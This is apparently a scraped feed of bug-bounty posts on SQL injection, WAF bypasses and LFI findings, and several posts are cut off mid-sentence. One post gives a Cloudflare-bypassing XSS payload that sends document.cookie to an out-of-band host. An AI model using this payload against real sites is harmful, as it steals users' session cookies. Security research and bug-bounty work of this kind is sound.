I just Published - A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) - I tried to explain everything I could. Let me know your opinion and suggestions, if any. I will keep updating the article whenever I

Wow. .

Another billion-dollar FinTech looking for free labor.

This payload bypasses Cloudflare waf in certain cases: "top[8680439. toString(30)](document.domain)" or "top[8680439. toString(30)](new%20Image().src%3D%27 https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

😂😂.

☕ 😂😂.

I'm a very early Twitter user. I have two accounts — one is personal and somewhat business-related, created 18 years ago and registered in July 2007. The other account this was registered in December 2010. Now don't guess my age 😂😂

A hacker claims to have breached an Indian nuclear and chemical company and is selling over 80 databases containing employee details, locations, critical infrastructure information, and more in the darkweb market place. @IndianCERT @Cyberdost @NCIIPC @AskAnshul.

This is a great tip for bypassing Cloudflare for SQLi/XSS etc. I recently tweeted something similar, where I managed to bypass a Cloudflare 403 bycombining multiple payloads, hope this helps 👇

What’s most valuable from a community member?.Choose honestly — what really earns your respect in the infosec community? . I’m asking because I’ve noticed a steep decline in knowledge sharing lately. Many seniors have stopped posting . Why do you think that is? #BugBounty.

Here is the script if you're interested — not maintained, no warranty.

Simple LFI using my path traversal script on GitHub. Used @0xAsm0d3us’s ParamSpider to gather URLs, filtered for relevant parameters, slightly modified the script to inject payloads into parameters like ?path and ?file, & ran the script — got 1 hit out of 20k+ URLs. The target is

"stealth"

So how does this work? There’s a login page that fetches custom images—like the company logo, from the server using a script called CustomImages.aspx. This script is vulnerable to LFI. When accessed directly, the script doesn’t display anything. But if you use an LFI payload in

Discovered a cool Windows LFI during a pentest in a widely used tool. This might be a 0-day — I found over 5k+ affected installations. Possibly another CVE in the pipeline. Payload:

😂😂.

Triager: WHOIS lookup of the public IP shows it belongs to the ISP, not the organization you're testing. Me: No, thats not how you test, perform a reverse SSL lookup which shows the certificate on the IP is issued to the organization — so this IP is assigned to them, hence the.